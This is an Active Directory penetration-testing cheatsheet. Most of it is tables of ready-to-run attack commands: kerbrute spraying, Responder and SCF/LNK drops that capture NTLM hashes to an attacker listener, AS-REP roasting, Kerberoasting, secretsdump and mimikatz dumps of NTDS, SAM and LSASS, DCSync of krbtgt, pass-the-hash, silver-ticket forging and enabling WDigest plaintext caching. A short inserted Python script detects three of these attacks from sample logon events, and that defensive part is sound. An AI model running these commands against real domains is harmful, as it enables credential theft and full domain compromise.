Active Directory Cheatsheet
Penetration testing and network exploitation rely on a wide array of tools and techniques for assessing the security of computer systems. These tools identify vulnerabilities, validate credentials, and simulate attacks to test defenses. From enumerating network shares and users to exploiting weaknesses in authentication protocols such as Kerberos, each tool serves a specific purpose in an engagement. This collection of commands gives an overview of the methods used to enumerate systems, manage credentials, gain remote access, and escalate privileges in an Active Directory environment, which in turn informs detection and mitigation. The tables below group these tools by phase.
The process generally follows these steps:
1- Get users (user enumeration with kerbrute).
2- Get passwords or hashes (AS-REP roasting, password spraying, NTLM hash capture, cracking, or relaying), then use them to connect, pass the hash, overpass the hash (for example when NTLM authentication is unavailable or a GUI session is needed), or perform DCSync.
3- Get service account passwords, hashes, or tickets (Kerberoasting via TGS-REP, silver ticket), then pass the hash or pass the ticket.
4- Get Domain Admin passwords or hashes (mimikatz, golden ticket) to connect, and establish persistence with a golden ticket or shadow copies.
More commands are listed on WADComs.
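The first three steps above each leave a distinct trace in the domain controller's Security log: a 4768 TGT request with pre-authentication type 0 (AS-REP roasting), a 4769 service ticket request with RC4 encryption 0x17 for a non-machine account (Kerberoasting), and a burst of 4625 failures for many different accounts from one source (password spraying). The following is an added example, not part of the original cheatsheet, that runs these three detection rules over constructed sample events; the key=value line format and the `spray_threshold` parameter are assumptions for the example, not a real EVTX layout.

```python
import re
from collections import defaultdict

# Constructed sample events in a simplified key=value form; field names mirror
# the Windows Security XML data names (TargetUserName, PreAuthType, ...).
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=svc_backup PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.0.0.55
EventID=4768 TargetUserName=alice PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.0.0.21
EventID=4769 TargetUserName=alice@DOMAIN.LOCAL ServiceName=MSSQLSvc TicketEncryptionType=0x17 IpAddress=10.0.0.55
EventID=4769 TargetUserName=alice@DOMAIN.LOCAL ServiceName=DC1$ TicketEncryptionType=0x12 IpAddress=10.0.0.21
EventID=4625 TargetUserName=bob IpAddress=10.0.0.55
EventID=4625 TargetUserName=carol IpAddress=10.0.0.55
EventID=4625 TargetUserName=dave IpAddress=10.0.0.55
EventID=4625 TargetUserName=alice IpAddress=10.0.0.21
"""


def parse_events(text):
    """Parse key=value event lines into dicts (constructed format, not a real EVTX parser)."""
    return [dict(re.findall(r"(\w+)=(\S+)", line)) for line in text.splitlines() if line.strip()]


def detect(events, spray_threshold=3):
    """Return findings keyed by the attack step they correspond to (assumed rule set)."""
    findings = defaultdict(list)
    failures = defaultdict(set)  # source IP -> distinct usernames with failed logons
    for ev in events:
        eid = ev.get("EventID")
        if eid == "4768" and ev.get("PreAuthType") == "0":
            # AS-REP roasting: a TGT was issued without Kerberos pre-authentication
            findings["asrep_roast"].append(ev["TargetUserName"])
        elif eid == "4769" and ev.get("TicketEncryptionType") == "0x17" \
                and not ev.get("ServiceName", "").endswith("$"):
            # Kerberoasting: RC4 service ticket requested for a non-machine SPN account
            findings["kerberoast"].append(ev["ServiceName"])
        elif eid == "4625":
            failures[ev["IpAddress"]].add(ev["TargetUserName"])
    for ip, users in failures.items():
        if len(users) >= spray_threshold:
            # Password spraying: one source failing against many distinct accounts
            findings["password_spray"].append(ip)
    return dict(findings)


if __name__ == "__main__":
    print(detect(parse_events(SAMPLE_EVENTS)))
```

The machine-account filter on `ServiceName` and the spray threshold are starting points to tune against a baseline, since legitimate RC4 tickets and help-desk lockouts also occur.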
| Tool/Command | Description |
|---|---|
| `enum4linux $IP` | Enumerate SMB shares and users on the target IP. |
| `crackmapexec smb --pass-pol $IP` | Retrieve the password policy from the target SMB server. |
| `crackmapexec smb $IP --shares` | List available SMB shares on the target IP. |
| `crackmapexec smb $IP -M spider_plus` | Run the spider_plus module to crawl readable shares and list their files. |
| `smbmap -u invalid -H $IP` | Check share access as a non-existent user (tests for guest/null access). |
| `ldapsearch -H ldap://$IP -x -b "dc=domain,dc=local"` | Perform anonymous LDAP enumeration against the target domain. |
Username Validation and Password Spraying
| Tool/Command | Description |
|---|---|
| `kerbrute_linux_amd64 userenum -d domain.local --dc $IP users.txt` | Enumerate valid usernames in the domain via Kerberos pre-authentication responses. |
| `kerbrute_linux_amd64 passwordspray -d domain.local --dc $IP users.txt 'S3cret'` | Spray a single password across the enumerated usernames. |
| `kerbrute_linux_amd64 bruteforce -d domain.local --dc $IP creds.txt` | Test a list of `user:password` pairs against the domain. |
| `crackmapexec smb $IP -u users.txt -p 'S3cret'` | Attempt SMB logins with a list of users and a single password. |
| `crackmapexec smb $IP -u users.txt -p passwords.txt` | Attempt SMB logins with a list of users and a list of passwords. |
| Tool/Command | Description |
|---|---|
| `crackmapexec smb 10.10.10.10 -u username -p password -M scuffy -o NAME=filename SERVER=IP_RESPONDER` | Drop an SCF file on a writable share to capture NTLM hashes when a user browses it. |
| `crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=filename SERVER=IP_RESPONDER` | Drop an LNK file on a writable share to capture NTLM hashes when a user browses it. |
| `responder -I tun0 -wv` | Run Responder to capture NTLM hashes by poisoning LLMNR and NBT-NS requests. |
| `\\\test` | Trigger authentication by accessing a UNC path, relaying the NTLM hash to a target machine. |
| Tool/Command | Description |
|---|---|
| `crackmapexec ldap $IP -u user -p P4ssword --password-not-required --admin-count --users --groups` | Enumerate LDAP with credentials, focusing on admin users and groups. |
| `enum4linux -u user -p P4ssword -a $IP` | Perform detailed SMB enumeration with credentials. |
| `crackmapexec smb $IP -u user -p P4ssword` | Connect to the SMB server with credentials. |
| `crackmapexec smb $IP -u user -p P4ssword --shares` | List SMB shares accessible with credentials. |
| `crackmapexec smb $IP -u user -p P4ssword -M spider_plus` | Run the spider_plus module with credentials. |
Kerberos and Ticket Management
| Tool/Command | Description |
|---|---|
| `impacket-getTGT domain.local/user:P4ssword` | Obtain a Kerberos TGT for the user and save it as `user.ccache`. |
| `export KRB5CCNAME=ksimpson.ccache` | Point Kerberos-aware tools at the ticket cache file. |
| `klist` | List cached Kerberos tickets. |
| `impacket-GetNPUsers -dc-ip $IP -no-pass -usersfile users.txt domain.local/` | Perform AS-REP roasting against accounts that do not require pre-authentication. |
| `impacket-GetUserSPNs -request -dc-ip $IP domain.local/user` | Perform Kerberoasting by requesting service tickets for accounts with SPNs. |
Remote Access and Execution
| Tool/Command | Description |
|---|---|
| `impacket-psexec domain.local/user:P4ssword@$IP` | Execute commands remotely via SMB. |
| `crackmapexec winrm $IP -u user -p P4ssword` | Connect to WinRM with credentials. |
| `evil-winrm -i $IP -u user -p P4ssword` | Connect to WinRM with credentials using Evil-WinRM. |
| `crackmapexec rdp $IP -u user -p P4ssword` | Connect to RDP with credentials. |
| `rdesktop -u user -p P4ssword -d domain.local $IP -r disk:tools=/home/kali/tools -r clipboard:PRIMARYCLIPBOARD` | Connect to RDP with credentials and mount a local tools directory. |
Password Dumping and Hash Management
| Tool/Command | Description |
|---|---|
| `impacket-secretsdump -just-dc domain.local/user:P4ssword@$IP` | Dump NTDS hashes from the domain controller. |
| `impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL` | Dump hashes from local SAM, SYSTEM, and SECURITY hive files. |
| `crackmapexec smb $IP -u user -p P4ssword --ntds` | Dump NTDS hashes via SMB. |
Bloodhound and Network Visualization
| Tool/Command | Description |
|---|---|
| `bloodhound-python -d domain.local -u user -p P4ssword -ns $IP -c all` | Collect data for Bloodhound network visualization. |
Pass-the-Hash Attacks
| Tool/Command | Description |
|---|---|
| `crackmapexec smb $IP -u administrator -H 'LMHASH:NTHASH' --local-auth` | Perform SMB login using pass-the-hash. |
| `impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@$IP` | Execute commands via SMB using pass-the-hash. |
| `crackmapexec winrm $IP -u administrator -H 'LMHASH:NTHASH' --local-auth` | Connect to WinRM using pass-the-hash. |
| `evil-winrm -i $IP -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6` | Connect to WinRM using pass-the-hash with Evil-WinRM. |
Silver Ticket and Other Advanced Attacks
| Tool/Command | Description |
|---|---|
| `impacket-getPac -targetUser administrator domain.local/user:P4ssword` | Obtain the PAC (including the domain SID) needed to build a Silver Ticket. |
| `impacket-ticketer -spn MSSQLSvc/dc1.domain.local -user-id 500 Administrator -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain domain.local` | Forge a Silver Ticket for a service using the service account's NT hash. |
| `impacket-mssqlclient -k dc1.domain.local` | Connect to MSSQL using the Silver Ticket from the Kerberos cache. |
Local Privilege Escalation and Shell Management
| Tool/Command | Description |
|---|---|
| `.\mimikatz.exe "privilege::debug" "token::elevate" "log hashes.txt" "sekurlsa::tickets" "sekurlsa::logonpasswords" "lsadump::sam" "exit"` | Elevate privileges, log output to a file, dump tickets and logon credentials, and dump SAM hashes using Mimikatz. |
| `.\mimikatz.exe "lsadump::dcsync /user:inlanefreight\krbtgt" "exit"` | Perform a DCSync attack to retrieve the krbtgt hash from the domain controller. |
| `.\mimikatz.exe "kerberos::list /export" "exit"` | List and export Kerberos tickets as .kirbi files. |
| `reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1` | Enable WDigest so that plaintext passwords are cached in LSASS on the next logon. |
Kerberos Ticket Management
| Tool/Command | Description |
|---|---|
| `.\mimikatz.exe "privilege::debug" "kerberos::ptt 0-2-0-40e10000-Administrator@krbtgt-HACKER.TESTLAB.kirbi" "exit"` | Pass-the-ticket using a .kirbi file. |
Bloodhound and Network Visualization
| Tool/Command | Description |
|---|---|
| `.\SharpHound.exe -c all` | Collect data for Bloodhound network visualization from a Windows host. |
| Tool/Command | Description |
|---|---|
| `net rpc password target_user -U pwned_user -S $IP` | Change another user's password over RPC using a compromised account. |
| `sudo ntpdate $IP` | Synchronize the local clock with the target server (Kerberos requires clocks to be in sync). |